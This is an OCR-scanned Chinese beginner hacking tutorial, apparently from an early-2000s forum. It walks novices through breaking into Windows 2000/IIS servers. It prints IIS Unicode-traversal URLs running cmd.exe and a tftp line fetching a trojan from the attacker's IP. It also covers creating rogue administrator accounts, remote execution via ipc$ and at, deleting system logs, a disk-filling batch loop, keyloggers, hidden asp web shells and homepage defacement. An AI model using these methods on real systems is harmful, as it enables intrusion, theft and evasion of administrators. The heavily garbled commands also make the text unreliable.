基礎(chǔ)知識(shí) 黑客

基礎(chǔ)知識(shí)（上）

我認(rèn)為這是一套適合初學(xué)者由淺到深的文章，所以強(qiáng)烈推薦給大家，作者從基礎(chǔ)講到最近比較火的漏洞，可

能有些人看來(lái)是淺了些，但是的確很適合想干點(diǎn)啥但又不知道怎么辦的菜鳥(niǎo)們.

第一節(jié)，伸展運(yùn)動(dòng)。這節(jié)操我們要準(zhǔn)備道具，俗話(huà)說(shuō)：“工欲善其事，必先利其器”（是這樣嗎？哎！文化

低……）說(shuō)得有道理，我們要學(xué)習(xí)黑客技術(shù)，一點(diǎn)必要的工具必不可少。

1，一臺(tái)屬于自己的可以上網(wǎng)的電腦。這樣你可以有充分的支配權(quán)，上網(wǎng)不用說(shuō)，否則你怎么看到我的文章？

wap?呵呵！屬于自己很重要，否則安全性是個(gè)很大的問(wèn)題。第一點(diǎn)相信大家沒(méi)有問(wèn)題。

2,windows2000/nt,別和我說(shuō)98/me,他們是你們同學(xué)用來(lái)玩游戲的！（當(dāng)然，我也是鐵桿gamefan）對(duì)網(wǎng)絡(luò)支

持極差，命令受限制，很多軟件又不能用，對(duì)黑客來(lái)說(shuō)使用起來(lái)絆手絆腳，非常不利。這里我推薦2000,這

是一個(gè)很成熟的系統(tǒng)（漏洞還是有一堆）。推薦雙系統(tǒng)，這樣黑玩搭配，干活不累。

3,冰河。中國(guó)第一木馬，中者數(shù)不勝數(shù)，國(guó)人驕傲。雖然用冰河根本不能算黑客，但它確實(shí)能培養(yǎng)你對(duì)黑客

的興趣，同時(shí)幫助你了解網(wǎng)絡(luò)，相信很多黑客同學(xué)都是這樣起步的。靜止寫(xiě)的那篇冰河教程很不錯(cuò)，大家仔

細(xì)看看。而且，以后你學(xué)會(huì)入侵服務(wù)器后，用冰河操作也會(huì)減少工作量（我是懶蟲(chóng)，爽?。?/p>

4,oicqo我們學(xué)黑客，可不是學(xué)泡mm!bfctx你息怒息怒！我們當(dāng)然是學(xué)黑客，但不要忘了，眾人

拾柴火更高，我們通過(guò)cshu的成員列表，互相聯(lián)系幫助，對(duì)提高水平很有幫助！另外我要廢話(huà)一句：據(jù)我了

解，現(xiàn)在黑客網(wǎng)站下載最多的都是針對(duì)oicq的破解工具，我個(gè)人認(rèn)為很無(wú)聊，偷個(gè)密碼代表什么，浪費(fèi)時(shí)間!

最后補(bǔ)充：皿不能不泡。（誰(shuí)砸我？？?。。?/p>

5,superscano很好用的端口掃描器，速度超快，功能一流，一旦擁有，別無(wú)所求……（打?。。┎徽撌钦?/p>

木馬受害者，還是掃服務(wù)器端口，它都非常有效，cshu強(qiáng)烈推薦！

6,一本筆記本/便條，網(wǎng)上資料相當(dāng)多，黑客處理的也是非常之多。良好的習(xí)慣決定了你的效率，準(zhǔn)備一本

筆記本，記錄下你的成果，肉雞，木馬利用，命令，密碼……堅(jiān)持一下，你會(huì)發(fā)現(xiàn)你的效率大幅上升的！

7,lc3.著名nt/2000sam破解程序，有時(shí)我們拿不到足夠權(quán)限，又沒(méi)好辦法，那么lc3是最好的解決辦法，只

要你拿的到sam,你就是服務(wù)器它爺爺！本站有其破解程序，支持了暴力破解！

8,程序合并。這是玩木馬必需的，雖然木馬是很低的手段，但有時(shí)配合巧辦法（以后我會(huì)介紹）確實(shí)能夠達(dá)

到意想不到的效果，朋友們可以在空閑時(shí)玩玩木馬，很有趣，若你能巧妙的騙過(guò)mm,那么webmaster也可能被

你騙倒：〉（比較理想化）

9,流光4for2000/nt。可能是世界上最好的綜合類(lèi)黑軟！中國(guó)的驕傲，它集成了很全的漏洞信息，速度快，

方法多，對(duì)有漏洞的主機(jī)是毀滅性的打擊，操作乂方便，是快速黑站必不可少的精品工具。超級(jí)吐血推薦！！

10,良好的心態(tài)，穩(wěn)定的情緒，刻苦估研的精神，刨根問(wèn)底的作風(fēng)，打掃房間的習(xí)慣。黑客是門(mén)很高深的學(xué)

問(wèn)，不要幻想一步登天，失敗是常有的事，千萬(wàn)不可灰心。在那么多黑軟的包圍下，切不可完全依賴(lài)他們，

一定要了解它們利用什么原理工作。對(duì)任何一個(gè)小問(wèn)題，小細(xì)節(jié)，一定要問(wèn)清楚，cshu就是給大家互相交流

的場(chǎng)所哦！黑完后不要得意忘形，打掃戰(zhàn)場(chǎng)也很重要，以防萬(wàn)一。

第一節(jié)操完，可能很無(wú)聊，我就這點(diǎn)水平，大家見(jiàn)諒！這里我說(shuō)一句大話(huà)：做完菜鳥(niǎo)操，包你會(huì)黑簡(jiǎn)單的站

（哎喲！心慌了?。?/p>

下一節(jié)操我們要介紹如何掌握一臺(tái)主機(jī)的基本信息，期待中……

真是太對(duì)不起大家了，隔了那么久才寫(xiě)這篇教程，我這幾天實(shí)在太忙，大家還是體諒一下我吧，好了，開(kāi)始

做操。

今天的內(nèi)容足獲得主機(jī)的信息。我們要黑一臺(tái)主機(jī)，首先要了解它的信息，包括它的類(lèi)型，用戶(hù)列表，目錄,

端口，漏洞等等。

首先我們我們要找一臺(tái)主機(jī)來(lái)練手，隨便挑吧！www.flyingfish.com（亂說(shuō)的）

第一部，呵呵，先在ie里看看吧，mmmm…..做的還行，挺精致的！主要是我們肯定了它現(xiàn)在是正常的。然后,

我們應(yīng)該知道它的ip,很簡(jiǎn)單，ping它一不就可以了。

pingwww.flyingfish.com,看看窗口里有了什么？是不是有三行回應(yīng),其中的111.111.222.222就是ip了

（還是胡說(shuō)的，一個(gè)例子）。有人是不是要問(wèn)，我這里怎么沒(méi)有。那可能是兩個(gè)原因，第一，你打錯(cuò)命令了；

第二，該主機(jī)裝了防火墻，禁止ping,不過(guò)這種可能很小。

知道了ip，下一步應(yīng)該確定端口了。下面是一些常用的端口的默認(rèn)值

21—ftp重要哦

23—telnet歡呼吧

25-smtp盡管重要，但似乎沒(méi)什么叫利用的

53-domain同上

79—finger可知道用戶(hù)信息了

80—http要看網(wǎng)頁(yè)，沒(méi)它不行吧

110—pop收信的

139—netbics共享用的，很有利用價(jià)值哦

3389—win2000超級(jí)終端呵呵，這個(gè)好！

其實(shí)端口有上千種，這些最最常用

我們?cè)趺粗婪?wù)器有什么端口打開(kāi)呢？？去找個(gè)掃描器吧，x-scan,superscan,flux等等很多哦。這里我

推薦superscan,速度很快，本站也有其教程哦！用法還是比較傻瓜的，估計(jì)大家不會(huì)有問(wèn)題，輕輕幾點(diǎn)，

打開(kāi)的端口就出現(xiàn)了。不錯(cuò)不錯(cuò)，上面說(shuō)到的都有（太理想化了吧?。?/p>

那么我們?cè)撊绾螒?yīng)對(duì)呢？

ps:忘了說(shuō)一聲，順便掃一下7626,冰河有也說(shuō)不準(zhǔn)哦：）

若有ftp,那就用用匿名登陸。自己動(dòng)手也行，最好用x-scanflux等吧！反正，有ftp就有一份希望

telnet在！好！telnet111.111.222.222,出現(xiàn)窗口了吧！嗯？要密碼？看來(lái)網(wǎng)管還不是超級(jí)注意文明用語(yǔ)：）

隨便猜個(gè)，錯(cuò)了，閃人！

smtp,看著它，無(wú)奈

domain,一般它帶了局域網(wǎng)了

finger可以知道用戶(hù)列表了，不好，忘了用法了，幸好finger很少出現(xiàn)

80肯定在，我們等會(huì)來(lái)對(duì)付它

110有smtp,pop在也不奇怪了

139找個(gè)掃描器來(lái)找找有沒(méi)有露在外面的共享吧，日后也用得著

3389太太太好了！！打開(kāi)客戶(hù)端吧，用輸入法漏洞試試，成了就干了它！不成也沒(méi)事，我們以后完全控制它

3389會(huì)很方便的。

端口掃完了！我們?cè)诙嗔私馑稽c(diǎn)吧！追捕大家都知道吧，其實(shí)用它獲取主機(jī)信息也不賴(lài)哦。打開(kāi)追捕，輸

入ip,選擇智能追捕，是不是有很多信息出來(lái)了？雖然不能直接利用，但畢竟我們有對(duì)它有了進(jìn)一步的了解。

掌握了那么多信息，我們?cè)撟鳇c(diǎn)什么了，一般黑客入侵都是靠著系統(tǒng)漏洞，不會(huì)都傻傻地去暴力破解的。我

們現(xiàn)在就要看看它有引么漏洞。

對(duì)漏洞大家可能不太了解，我這里也不能一一說(shuō)明了，太多了，感興趣的話(huà)去論壇找freedom吧！

目前廣泛利用和存在的漏洞有:unicode,unicode后續(xù)，iis溢出，.用q,.frontpageextend,輸入法漏洞等等

大漏洞。至于如何確定，呵呵，絕對(duì)不會(huì)是一行一行地在ie中試吧，拿出x-scan吧，很好的掃描器哦！

稍微設(shè)置一下就上路吧！過(guò)了一會(huì)，呵呵，報(bào)告出來(lái)了，快看，哇！漏洞一大堆！這下賺了！各條漏洞都有

詳細(xì)的信息，大家看吧，總比我說(shuō)的準(zhǔn)了。

現(xiàn)在這臺(tái)主機(jī)已經(jīng)和我們成為親戚了，要讓這位親愛(ài)的親戚做點(diǎn)事，就要開(kāi)始各種攻擊了，下回我們就探討

一下最最可愛(ài)的unicode漏洞，各位可能就會(huì)在unicode中完成第一次黑客體驗(yàn)

基礎(chǔ)知識(shí)（中）

上傳，這個(gè)我們后面介紹。

幾點(diǎn)忠告：

1,對(duì)于沒(méi)有主頁(yè)的機(jī)器（就是正在建立的主頁(yè)），不要改它，這很沒(méi)水準(zhǔn)，也很沒(méi)道德

2,echo前記得幫他們做好備份

3,不準(zhǔn)在主頁(yè)里加入惡性語(yǔ)句

2,下載文件

要是有什么有用的文件被你發(fā)現(xiàn)，那我們?nèi)绾蜗螺d呢？

最簡(jiǎn)單的方法：把文件copy至網(wǎng)頁(yè)目錄下。copyc:\email\baby.emlc:\inetpub\wwwroot\baby.zip,然后，

下載H.ll.22.22/baby.zip就行了，注意！實(shí)際應(yīng)用中要記得對(duì)文件名進(jìn)行修改，總之不能暴露。

別的方法：對(duì)不起，沒(méi)想好：）

3,最重要的上傳

一般方法：ftp法

首先建一個(gè)ftp腳本文件：c:\hehe.haha（名字亂取把），申請(qǐng)一個(gè)ftp賬號(hào)，然后用echo吧

echo+openftp.eshu.com（ftp主機(jī)）>c:\hehe.haha

echo+useryourname>>cc:\hehe.haha（yourname是用戶(hù)名）

echo+yourpasswd>>c:\hche.haha（yourpasswd是密碼）

echo+getsetup.exe?c:\hehe.haha要下載的文件

echo+quit?c:\hehe.haha

完了以后:ftp+/s:c:\hehe.haha,由于是ftp主機(jī),那么速度?定很快，過(guò)?會(huì)setup.exe就會(huì)出現(xiàn)在當(dāng)前目

錄了（也就是emd所在目錄）

別忘了先上傳到ftp主機(jī)，不要做馬大哈哦!

最簡(jiǎn)單的方法：tftp法。

這種方法不用中轉(zhuǎn)服務(wù)器，首先準(zhǔn)備一個(gè)tftp服務(wù)端，它的作用就是把你的機(jī)器做成一個(gè)tftp服務(wù)器，利用

漏洞機(jī)器來(lái)下載（注意，運(yùn)行tftp時(shí)不要運(yùn)行其他的ftp軟件）

在這里我推薦ciscotftpserver,自己去找找把，實(shí)在沒(méi)有來(lái)找我：）

安裝好后運(yùn)行，別忘了設(shè)置好默認(rèn)目錄，否則會(huì)找不到文件

tftp命令：tftp-i1.2.3.4GETihateu.exec:\winnt\ihateu.exe（ihateu.exe在默認(rèn)目錄里）

1.2.3.4為你的ip,用Unicode運(yùn)行一下，會(huì)看到tftpserver里有反應(yīng)了，這就好了，不一會(huì)，文件就傳上去

了，方便把！

學(xué)會(huì)了上傳，我們就可以好好改主頁(yè)，還可以上傳木馬，還可以把程序放上去運(yùn)行（運(yùn)行程序和在d

os里一樣）

4,如何清除痕跡

雖然國(guó)內(nèi)主機(jī)紀(jì)錄ip的不是很多，但萬(wàn)事小心為妙，unicode權(quán)限達(dá)不到admin。用cleaniislog行不通，

就宜接刪吧！

C:\winnt\system32\logfiles\*.*

C:\winnt\ssytem32\config\*.evt

C:\winnt\system32\dtclog\*.*

C:\winnt\system32\*.log

C:\winnt\system32\*.txt

C:\winnt\*.txt

C:\winnt\*.log

全……擦掉！

四，細(xì)節(jié)問(wèn)題。

1,遇到長(zhǎng)文件名怎么辦？

c:\programfiles\

就用。：、1*0紅2成0%門(mén)及5”\

2,遇到空格怎么辦？

%代替嘍,或者XXyy=xxyy~l

基礎(chǔ)知識(shí)（5）

%代替嘍,或者xxyy=xxyy'l

3,如何做個(gè)很大的文件？

目的就是破壞啦！我不喜歡不過(guò)教教你們啦

?echooff

echobig>c:\a.a

:h

copyc:\a.a+c:\a.ac:\a.a

gotoh

注意不要亂來(lái)??！

4,輸入命令，沒(méi)反應(yīng)或反應(yīng)不對(duì)v

：）請(qǐng)檢查檢查再檢查命令的正確性，可能沒(méi)有漏洞，那就閃人！看在你看到這里那么給我面子的份上，在

給你幾個(gè)吧！

http://wu-u\exsample,com/scripts/???macr;..a

"./winnt/systcm32/cmd.cxc?/c+dir+c:\或http:〃www.cxsamplc.com/msadc/..???2/cmd.exe?/c+dir

+c:\或http://www.exsample.com/_vti_bin…2/cmd.exe?/c+dir+c:\或http://\mv.exsample.com/_me

m_bin…2/cmd.exe?/c+dir+c:\

不一定有用哦！

5,如何找到Unicode漏洞的主機(jī)

呵呵：）最好的方法自然是個(gè)一個(gè)ping,一個(gè)一個(gè)試嘍：）

不要打我呀！我說(shuō)我說(shuō)。最好找一個(gè)cgi掃描器，unicode查找器多如之毛，隨便找個(gè)吧！

6,我copy,del文件,怎么顯示aceessdenined?

這個(gè)不好辦了，由于Unicode所擁有的權(quán)限有限，出現(xiàn)上述情況很正常，我們要做的便是提高自己的權(quán)限！

這個(gè)我會(huì)在今后介紹，現(xiàn)在你可以試試attrib

attrib-r-h-sc:\autoexec.bat

再對(duì)autoexec,bat進(jìn)行操作，看看有沒(méi)有效果，成功率不高，不好意思！

7,我黑了主頁(yè)，天下無(wú)敵？

我本來(lái)想對(duì)你說(shuō)：“見(jiàn)你的鬼去吧！”不過(guò)想想不大禮貌，有失我紳二風(fēng)度，所以改個(gè)口

echo主頁(yè)或改主頁(yè)在不懂黑客的人看起來(lái)很了不起，不過(guò)，它最多算是一個(gè)基礎(chǔ)，拿到admin才是我們的終極

目標(biāo)！

對(duì)eshu全體成員來(lái)說(shuō)，不準(zhǔn)去改正在建立的網(wǎng)頁(yè)！這是我們的原則！

要是你想耍耍威風(fēng)，那也可以理解，那就去黑外國(guó)的，或者url欺騙也是個(gè)好選擇

8,我如何做更多的事？

第一，努力提高權(quán)限

第二，由于emd的限制，我們可以做的不多，那就要程序幫忙，上傳吧！切記，要隱秘！

一，frontpage擴(kuò)展攻擊。

為什么把它放第一位呢？原因很簡(jiǎn)單，它最最方便，frontpage服務(wù)器擴(kuò)展是一種方便的遠(yuǎn)程站點(diǎn)管理功能，

可是由于某些網(wǎng)管注意文明用語(yǔ)的疏忽（為什么注意文明川語(yǔ)滿(mǎn)街飛？）不設(shè)置訪問(wèn)密碼，如果那樣的話(huà)，

我們只要用一個(gè)frontpage就可以黑它了??！這完全不是黑客工具，但它確實(shí)辦到了，還要感謝注意文明用語(yǔ)

網(wǎng)管和微軟??！

具體做法:

1,準(zhǔn)備frontpage,我是用dreamweaver的，但它不能黑?。海┳詈檬?000版，只是不要是老掉牙的版本就行

了。

2,找一臺(tái)有frontpage擴(kuò)展的主機(jī)，可以用流光，也可以用搜索引擎查找/_vti_pvt/,這是frontpage擴(kuò)展的

木小志O

3,接下來(lái)打開(kāi)frontpage,（媽媽?zhuān)耗阍诟墒裁矗炕卮穑鹤鼍W(wǎng)頁(yè)！媽媽?zhuān)汉煤⒆樱。┪募藛蜗逻x擇“打開(kāi)站

點(diǎn)”，然后在文件夾框里寫(xiě)入http://ll.ll.22.22（我習(xí)慣用這個(gè)做例子

基礎(chǔ)知識(shí)（下）

netuseriusrmachinenameeshu（把它的密碼設(shè)為eshu）

netlocalgroupadministratorsiusr_machinename/add（力口入adminislralors組）

這樣我們就擁有了iusrjnachinename這一賬號(hào)，admin權(quán)限，簡(jiǎn)單吧！

熟悉一下notuse命令：

netuse\11.11.22.22\ipc$“eshu"/user:iusr_machinename建立連接

copyc:\haha.exe\11.11.22.22\admin$把haha.exe復(fù)制到機(jī)器c:\wirmt\system32上,若是c$.d$，就表示

c,d盤(pán)

nettime\11.11.22.22看到了時(shí)間了,比如是8點(diǎn)

at\11.11.22.228:03haha.exe就會(huì)在8點(diǎn)3分執(zhí)行。

netuse\11.11.22.22/delete斷開(kāi)連接

應(yīng)該是很簡(jiǎn)單的。這樣我們就可以隨心所欲地操作11.11.22.22了，admin是最高權(quán)限，所以沒(méi)有限制的：）

是不是很簡(jiǎn)單？所以我是溢出是很厲害的攻擊方法。

3389知道吧！如果能進(jìn)入，那么用上面的命令也可以輕易拿到admin的，不過(guò)呢，有3389漏洞的機(jī)器已經(jīng)不多

了。看你運(yùn)氣了?。ū菊居袔灼P(guān)于3389的好文章）

總的來(lái)說(shuō)，還是Unicode的機(jī)器最多，為什么注意文明用語(yǔ)網(wǎng)管不會(huì)滅絕呢：）雖然unicode拿admin有一定難

度，但還是要試試的。

首先，我們檢查一下unicode在這臺(tái)機(jī)器上的權(quán)限，一般看讀寫(xiě)權(quán)限和運(yùn)行權(quán)限。用copy或del命令便可確定

讀寫(xiě)權(quán)限，然后.上傳文件運(yùn)行一下便可知道運(yùn)行權(quán)限。

1,如果我們可以對(duì)winnt\repair和winnt\eonfig進(jìn)行訪問(wèn)，sam文件就在里面（win2k里是sam,nt4里是sam.

_）那么用tftp把get改成put下載下來(lái)，或者把它復(fù)制到inetpub\wwwroot下，改成zip下載。

拿到sam后，用lc3破解版暴力破解吧，這種方法比較費(fèi)時(shí)。

2,要是有運(yùn)行權(quán)限，拿就拋個(gè)木馬上去吧！雖說(shuō)木馬可能也會(huì)沒(méi)有權(quán)限，但自啟動(dòng)的模式在admin登陸后可

能會(huì)自己提升了權(quán)限。要注意的是，最好放最新的木馬，因?yàn)槟抉R很容易被殺毒軟件查殺！

3,其實(shí)和2差不多，只不過(guò)變成了鍵盤(pán)記錄器，選個(gè)國(guó)產(chǎn)的，一般殺毒軟件不會(huì)殺出來(lái)，認(rèn)真配置好后傳上

去，下線睡覺(jué)或是做家務(wù)去！等到網(wǎng)管序了機(jī)器，密碼就會(huì)被紀(jì)錄下來(lái)，我們?cè)谌ト?，admin就順利到手了：）

4,geladmin和pipeupadmin,前者是nl4用的，后者是2000?？纯磶椭朗褂梅椒ê螅ㄆ鋵?shí)猜都猜得到）就

可以提升一個(gè)用戶(hù)的權(quán)限，有一步登天的感覺(jué)！

5,手工做個(gè)bat文件，里面是建立用戶(hù)等命令，然后把它放到自啟動(dòng)下，有很多途徑：documentsandsetti

ngs下的開(kāi)始菜單下的啟動(dòng)，知道了吧，至于要順利放進(jìn)去的話(huà)，會(huì)遇到空格長(zhǎng)名等等問(wèn)題，就看你的基本功

了。win.ini里有l(wèi)oad,加進(jìn)去。還有便是注冊(cè)表，好好研究一下regedit.

6,本地溢出。這個(gè)比較高深，我能告訴大家的只是，去四處找找本地溢出程序。

總的來(lái)說(shuō)，unicode改主頁(yè)是非常簡(jiǎn)單的，但是若是要取得更高的權(quán)限，就要一番努力，上面的方法只是些思

路，實(shí)際操作時(shí)需要具體處理，開(kāi)動(dòng)腦筋，把方法都結(jié)合起來(lái)。（是穴是聽(tīng)起來(lái)有點(diǎn)玄？）

想想好像沒(méi)有什么其他的途徑要說(shuō)了，什么？linux,呵呵，我還不大懂，就不在這里瞎說(shuō)了。

那今天就說(shuō)到這里了，6里面我會(huì)說(shuō)說(shuō)后門(mén)制作，小問(wèn)題和我的一點(diǎn)經(jīng)驗(yàn)。期待吧！

這是最后一節(jié)了，寫(xiě)的傻傻的，但我畢竟堅(jiān)持下來(lái)了，值得鼓勵(lì)?。ㄅ紶柊一下）在寫(xiě)菜鳥(niǎo)操的同時(shí).，我們

的cshu（cshu.51.net）也在默默成長(zhǎng)，但現(xiàn)在我要準(zhǔn)備離開(kāi)了，真是有點(diǎn)舍不得。在今后的日子里，還請(qǐng)大家

多多支持cshu和christ,freedom他們。

今天說(shuō)點(diǎn)什么呢？沒(méi)有主題，亂談一通吧！

首先我要吐一次血，當(dāng)然是為了推薦一樣?xùn)|西，就是流光?。敲礇](méi)創(chuàng)意，老土?。┎还茉趺凑f(shuō)，小榕的流

光應(yīng)該是中國(guó)第一黑軟，他綜合了諸多的攻擊手段，使攻擊便捷化，當(dāng)然可能讓我們養(yǎng)成了懶惰的習(xí)慣。不

會(huì)用流光的最好去學(xué)學(xué)。

我來(lái)說(shuō)說(shuō)我自己覺(jué)得最有用的幾個(gè)項(xiàng)目：

1,探測(cè)--掃描pop3/ftp/nt/sql主機(jī)，要是無(wú)目的地黑，那么用這個(gè)再合適不過(guò)了。進(jìn)去后填好ip范圍（范

圍可以?huà)叽??點(diǎn)，它很快的），至于類(lèi)型嘛,要是你要“大堆unicode,那么選擇iis/frontpage再合適不過(guò)

了，要是要更高的權(quán)限，sql是不錯(cuò)的選擇。完成后，表格里會(huì)多出一大堆東西。

remoteexecutex這是幾種不同的unicode,用它比用ie來(lái)執(zhí)行方便多了,但是echo有問(wèn)題（是我自己不會(huì),

會(huì)的朋友快教我）

remoteftppcawfilemethod-x這是遠(yuǎn)程獲取pcanywhere的密碼文件，要使用的話(huà)，你首先要有一個(gè)ftp

賬號(hào)，去申請(qǐng)吧！順利拿到cif文件后，用流光自帶的工具就可以解開(kāi)密碼，很爽的！

remoteftpsam-x拿sam的,還是用最好的lc3來(lái)解吧!

frontpageextended這是frontpage擴(kuò)展，不過(guò)不要高興，是要密碼的。但是若是后面跟了privilegehole

的話(huà)，放聲大笑吧?。ㄐ⌒牟灰屶従幽弥说稕_進(jìn)來(lái)）打開(kāi)frontpage,打開(kāi)站點(diǎn)，http:〃ip就可以了！

（http:〃不要忘）

此外還有一點(diǎn)變通，大家肯定讀的懂的。

2,探測(cè)--高級(jí)掃描工具。這可是流光4中的重頭戲，綜合了很多漏洞，還可以用plugin功能加入新的漏洞。

這項(xiàng)功能很適合對(duì)某一站點(diǎn)進(jìn)行探測(cè)，很快掃出漏洞后，流光會(huì)生成一個(gè)報(bào)告文件，其中包含漏洞的連接，

要是你看不懂的話(huà)，建議你拿出x-scan,里面有漏洞描述的。

3,工具--減管道遠(yuǎn)程命令，種植者，這兩項(xiàng)功能對(duì)我們攻擊nt來(lái)說(shuō)是相當(dāng)好用的。但前提是要有賬號(hào)，相

信在此之前你應(yīng)該有幾個(gè)了吧，那就快點(diǎn)試試吧！

總的來(lái)說(shuō)，流光的使用是非常簡(jiǎn)單的，其中也有不少工具值得我們一月，tools目錄里有一些很好的工具，ex

ploit里則有很多溢出攻擊程序，前提是你應(yīng)該會(huì)c,不會(huì)的話(huà)我也沒(méi)辦法，學(xué)會(huì)c起碼要看10倍于菜鳥(niǎo)操的資

料吧！另外給大家推薦一個(gè)站點(diǎn)：\v\vw.hack.co.za,有什么漏洞的話(huà)就去那里找找，你會(huì)有所收獲的。

然后我想說(shuō)說(shuō)一些黑站的經(jīng)驗(yàn)。

☆當(dāng)我們用Unicode控制一臺(tái)機(jī)器時(shí)，我向大家推薦用asp木馬，阿新的改良版，本站有下載的。上傳asp文件

前不要忘了修改list.asp中的地址信息，最好也放一個(gè)cmd.asp上去，運(yùn)氣好的話(huà)，可以運(yùn)行命令的。

上傳好后，i。里輸入其中index,asp的地址，呵呵，我們就能方便地管理其中的文件了，可以改網(wǎng)頁(yè)，改代碼,

上傳腳本文件麻煩？那就用它來(lái)生成吧！

推薦他的最大原因便是--便于隱藏！一般網(wǎng)站總有一個(gè)龐大的目錄，選擇一個(gè)深的，放進(jìn)去，網(wǎng)管很難發(fā)現(xiàn)

的：）

最后對(duì)大家說(shuō)一句，耍是有備份目錄（很多網(wǎng)站都有的），最好也放一份進(jìn)去。有一次我用這個(gè)東西修改一

家網(wǎng)站的首頁(yè)，改了兩三次網(wǎng)管也沒(méi)刪掉，可是突然一天不行了，原呆他用了備份的網(wǎng)頁(yè)（還算機(jī)靈吧）

☆我想對(duì)大家說(shuō)，對(duì)于國(guó)內(nèi)網(wǎng)站，最好不要惡意去攻擊，因?yàn)槲覀兪侵袊?guó)人嘛！在5/1期間，我發(fā)現(xiàn)有一些國(guó)

內(nèi)站點(diǎn)被黑，留下的頁(yè)面上不是poisonbox,而是中國(guó)人的話(huà)，這真是無(wú)恥到了極點(diǎn)?。。。〈蠹仪f(wàn)不要

學(xué)哦.還有,現(xiàn)在網(wǎng)卜有很多壞沒(méi)有網(wǎng)頁(yè)的主機(jī).件件有很多漏洞,對(duì)干這種機(jī)器，竟有一曲小人也會(huì)夫改

收頁(yè)（比如上海那個(gè)姓楊的小子）這算什么？顯示實(shí)力，炫耀技術(shù)？呵呵，見(jiàn)鬼去吧！

我的建議是，不要改它的首頁(yè)，而是努力去拿admin,